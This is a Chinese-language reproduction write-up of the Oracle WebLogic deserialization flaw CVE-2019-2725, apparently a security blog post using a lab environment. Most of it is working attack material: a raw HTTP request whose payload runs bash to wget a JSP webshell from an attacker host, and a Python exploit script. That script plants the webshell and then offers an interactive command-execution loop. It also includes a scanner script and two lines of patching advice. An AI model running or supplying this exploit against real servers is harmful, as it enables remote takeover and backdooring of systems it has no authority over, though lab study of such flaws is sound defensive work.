漏洞描述
CVE-2019-2725是一個Oracle weblogic反序列化遠程命令執行漏洞,這個漏洞依舊是根據weblogic的xmldecoder反序列化漏洞,通過針對Oracle官網歷年來的補丁構造payload來繞過。
影響版本 :
weblogic 10.x
weblogic 12.1.3
環境搭建
使用Vulfocus平台進行復現
可以直接使用官方平台進行漏洞復現,如果有興趣可以自己搭建Vulfocus平台
可以參考我以前的文章:傳送門
進入鏡像管理,搜索漏洞鏡像,下載鏡像
啟動鏡像
測試
http://192.168.132.144:58832/
漏洞復現
可以訪問/_async/AsyncResponseService,則存在漏洞
http://192.168.132.144:58832/_async/AsyncResponseService
查看網站路徑
http://192.168.132.144:58832/_async/AsyncResponseService?info
在本機中開啟簡易http服務器
python3 -m http.server 8000
使用burp suite進行抓包,發送數據包,使服務下載木馬文件
服務器從攻擊者主機成功下載腳本
查看服務器中腳本文件
docker exec -it 6ee62a1d9545 bash
cd user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/bea_wls9_async_response/8tpkys/war
訪問腳本,執行命令
http://192.168.132.144:58832/_async/2.jsp?pwd=023&i=ls
Burp Suite POC
POST /_async/AsyncResponseService HTTP/1.1
Host: 192.168.132.144:58832
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: vue_admin_template_token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjoxLCJ1c2VybmFtZSI6ImFkbWluIiwiZXhwIjoxNjM1MjA5NjEyLCJlbWFpbCI6IiJ9.cTSjCtV8thEmdfyP49gCsHldvX6KAAMjGQ209TCg0K8; JSESSIONID=050455BA3767B12181C6AA3E09AA3064
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Length: 854
SOAPAction:
Accept: */*
User-Agent: Apache-HttpClient/4.1.1 (java 1.5)
Connection: keep-alive
content-type: text/xml
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing"
xmlns:asy="http://www.bea.com/async/AsyncResponseService">
<soapenv:Header>
<wsa:Action>xx</wsa:Action>
<wsa:RelatesTo>xx</wsa:RelatesTo>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>/bin/bash</string>
</void>
<void index="1">
<string>-c</string>
</void>
<void index="2">
<string>wget http://HackerIP:8080/JspSpy.jsp.txt -O servers/AdminServer/tmp/_WL_internal/bea_wls9_async_response/8tpkys/war/2.jsp</string>
</void>
</array>
<void method="start"/></void>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body>
<asy:onAsyncDelivery/>
</soapenv:Body></soapenv:Envelope>
POC和EXP腳本
POC代碼
#CVE-2019-2725-POC
__author__ = '紙機'
import requests
import optparse
import os
parse = optparse.OptionParser(usage = 'python3 %prog [-h] [-u URL] [-p PORT] [-f FILE]')
parse.add_option('-u','--url',dest='URL',help='target url')
parse.add_option('-p','--port',dest='PORT',help='target port[default:7001]',default='7001')
parse.add_option('-f',dest='FILE',help='target list')
options,args = parse.parse_args()
#print(options)
#驗證參數是否完整
if (not options.URL or not options.PORT) and not options.FILE:
print('Usage:python3 CVE-2019-2725-POC.py [-u url] [-p port] [-f FILE]\n')
exit('CVE-2019-2725-POC.py:error:missing a mandatory option(-u,-p).Use -h for basic and -hh for advanced help')
filename = '/_async/AsyncResponseService'
def checking(url):
try:
response = requests.get(url+filename)
if response.status_code == 200:
print('[+] {0} 存在CVE-2019-2725 Oracle weblogic 反序列化遠程命令執行漏洞'.format(url))
else:
print('[-] {0} 不存在CVE-2019-2725 Oracle weblogic 反序列化遠程命令執行漏洞'.format(url))
except Exception as e:
print("[-] {0} 連接失敗".format(url))
exit()
if options.FILE and os.path.exists(options.FILE):
with open(options.FILE) as f:
urls = f.readlines()
#print(urls)
for url in urls:
url = str(url).replace('\n','').replace('\r','').strip()
checking(url)
elif options.FILE and not os.path.exists(options.FILE):
print('[-] {0} 文件不存在'.format(options.FILE))
exit()
else:
#上傳鏈接
url = options.URL+':'+options.PORT
checking(url)
測試
python3 CVE-2019-2725-POC.py -u http://192.168.132.144 -p 63473
python3 CVE-2019-2725-POC.py -f IP.txt
EXP代碼
#CVE-2019-2725 EXP
__author__ = '紙機'
import requests
import optparse
import time
parse = optparse.OptionParser(usage = 'python3 %prog [-h] [-u URL] [-p PORT] [-f FILE] [-l locate]')
parse.add_option('-u','--url',dest='URL',help='target url')
parse.add_option('-p','--port',dest='PORT',help='target port[default:7001]',default='7001')
parse.add_option('-l','--locate',dest='LOCATE',help='sevice script')
options,args = parse.parse_args()
#驗證參數是否完整
if not options.URL or not options.PORT:
print('Usage:python3 CVE-2019-2725-POC.py [-u url] [-p port] [-l http://hack/script]\n')
exit('CVE-2019-2725-POC.py:error:missing a mandatory option(-u,-p).Use -h for basic and -hh for advanced help')
#網站地址
url = options.URL+':'+options.PORT
#查看weblogic中間的版本目錄
url_route = '//_async/AsyncResponseService'
#命令執行參數
payload = '/_async/3.jsp?pwd=023&i='
#獲得weblogic中間的版本目錄
def route(url):
print('[*] 獲得路徑中')
try:
#print('[*] 目標地址:'+url)
respond = requests.get(url)
if respond.status_code == 200:
route = str(respond.text)
start = route.index('async_response/')
#print(start)
if start >= 0:
start += len('async_response/')
#print(start)
end = route.index('/war')
#print(end)
#print(route[start:end])
return route[start:end];
else:
print("[-] 路徑獲取失敗")
exit()
except Exception as e:
print("[-]{0}連接失敗".format(url))
exit()
headers = {'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0',
'SOAPAction':
'Accept: */*',
'User-Agent': 'Apache-HttpClient/4.1.1 (java 1.5)',
'content-type': 'text/xml'}
#data數據,反序列化,從攻擊者服務器獲得木馬文件
data = '''<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing"
xmlns:asy="http://www.bea.com/async/AsyncResponseService">
<soapenv:Header>
<wsa:Action>xx</wsa:Action>
<wsa:RelatesTo>xx</wsa:RelatesTo>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>/bin/bash</string>
</void>
<void index="1">
<string>-c</string>
</void>
<void index="2">
<string>wget {0} -O servers/AdminServer/tmp/_WL_internal/bea_wls9_async_response/{1}/war/3.jsp</string>
</void>
</array>
<void method="start"/></void>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body>
<asy:onAsyncDelivery/>
</soapenv:Body></soapenv:Envelope>'''.format(options.LOCATE,route(url+url_route+'?info'))
#從攻擊者http服務器中下載木馬文件
def acquire(url):
print('[*] 目標地址:'+url)
print('[*] 攻擊者地址:'+options.LOCATE)
try:
respond = requests.post(url+url_route,headers=headers,data = data)
#print(respond.status_code)
if respond.status_code == 202:
print('[+] 木馬下載成功')
else:
print('[-] 下載失敗')
exit()
except Exception as e:
print("[-]{0}連接失敗".format(url))
exit()
#命令執行
def attack(url,cmd):
try:
respond = requests.get(url+payload+cmd)
if respond.status_code == 200:
print(str(respond.text).replace("<pre>","").replace("</pre>","").strip())
else:
print('[-] 命令執行錯誤')
except Exception as e:
print("[-] {0} 連接失敗".format(url))
exit()
#下載木馬文件
acquire(url)
time.sleep(0.5)
#命令執行
print('輸入執行命令(quit退出):')
while(1):
cmd = input('>>>')
if(cmd == 'quit'):
break
attack(url,cmd)
測試
python3 CVE-2019-2725-EXP.py -u http://192.168.132.144 -p 63473 -l http://192.168.132.144:8000/backdoor.jsp.txt
修復建議
-
升級本地JDK環境
-
及時安裝官方補丁
參考文章